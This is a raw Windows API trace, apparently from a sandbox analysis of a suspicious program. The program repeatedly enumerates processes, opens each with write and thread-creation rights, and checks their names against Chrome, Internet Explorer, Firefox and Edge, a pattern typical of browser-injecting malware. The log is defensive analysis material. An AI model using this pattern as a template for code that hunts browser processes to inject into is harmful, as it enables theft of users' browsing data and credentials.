	[0255.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xaf24
	[0255.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.315] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.315] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.315] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.316] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.316] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xaf28
	[0255.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.317] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.317] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.317] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xaf2c
	[0255.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.319] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.319] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.319] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.319] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xaf30
	[0255.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.320] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.321] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.321] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.321] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xaf34
	[0255.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.323] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.323] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.323] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.323] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0255.324] CloseHandle (hObject=0x4fd0) returned 1
	[0255.324] Sleep (dwMilliseconds=0x64) 
	[0255.420] GetCurrentProcessId () returned 0x110
	[0255.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0255.426] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0255.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0255.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0255.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xaf38
	[0255.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.435] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.436] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.436] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.436] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xaf3c
	[0255.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.437] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.438] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.438] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.438] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0255.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xaf40
	[0255.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.440] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0255.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.440] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.441] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0255.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.442] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xaf44
	[0255.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.443] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.443] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.443] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.444] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0255.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xaf48
	[0255.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0255.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0255.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.446] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0255.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xaf4c
	[0255.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.447] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0255.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.448] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.448] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0255.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.448] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0255.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xaf50
	[0255.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.450] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0255.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.450] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.450] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0255.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.450] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0255.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xaf54
	[0255.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.452] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.452] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.452] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.452] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xaf58
	[0255.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.455] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.455] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.455] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.456] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xaf5c
	[0255.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.457] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.458] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xaf60
	[0255.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.459] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.459] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.459] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.460] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xaf64
	[0255.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.461] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.462] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xaf68
	[0255.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.463] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.463] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.464] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.464] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xaf6c
	[0255.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.465] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.466] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.466] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xaf70
	[0255.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.467] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.468] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0255.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xaf74
	[0255.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.469] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0255.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.470] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.470] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0255.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.470] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xaf78
	[0255.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.471] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.472] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.472] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0255.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xaf7c
	[0255.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.473] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.474] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.474] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.474] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xaf80
	[0255.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.475] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.476] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.476] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
